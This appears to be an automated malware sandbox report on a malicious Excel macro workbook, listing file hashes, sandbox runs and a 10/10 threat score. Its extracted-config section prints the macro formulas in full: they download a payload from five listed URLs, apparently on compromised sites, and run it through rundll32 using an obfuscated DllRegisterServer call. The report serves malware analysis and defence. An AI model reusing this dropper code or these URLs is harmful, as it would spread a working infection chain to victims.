General
-
Target
e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7
-
Size
103KB
-
Sample
241111-vl71xasdjf
-
MD5
172f22a056537d74eed933a35a33efaa
-
SHA1
b3dc4ea706f8edca034d3c9f721eef33ac49b9cb
-
SHA256
e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7
-
SHA512
bf537fef12be6790c2831ef57ef7f6b6b8104e27341b87a02f3de28c941252422ba3d7ceb771986e22072f0a3feeef98be8fee5d49108267025d5a8dc510359a
-
SSDEEP
3072:jHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:DhRYXHrbtO8eOaDPk1ox
Behavioral task
behavioral1
Sample
e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7.xlsm
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://landorestates.com/wordpress/NELf96wr/
https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/
http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/
https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/
https://csinoticias.com/wp-includes/RnHjIzg/
-
formulas
=FORMULA() =TODO =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://landorestates.com/wordpress/NELf96wr/","..\wlw.ocx",0,0) =IF('TTGEHEHEHFHDG'!C15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://csinoticias.com/wp-includes/RnHjIzg/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\wlw.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")
Extracted
http://landorestates.com/wordpress/NELf96wr/
https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/
http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/
https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/
https://csinoticias.com/wp-includes/RnHjIzg/
Extracted
http://landorestates.com/wordpress/NELf96wr/
https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/
Targets
-
-
Target
e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7
-
Size
103KB
-
MD5
172f22a056537d74eed933a35a33efaa
-
SHA1
b3dc4ea706f8edca034d3c9f721eef33ac49b9cb
-
SHA256
e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7
-
SHA512
bf537fef12be6790c2831ef57ef7f6b6b8104e27341b87a02f3de28c941252422ba3d7ceb771986e22072f0a3feeef98be8fee5d49108267025d5a8dc510359a
-
SSDEEP
3072:jHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:DhRYXHrbtO8eOaDPk1ox
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-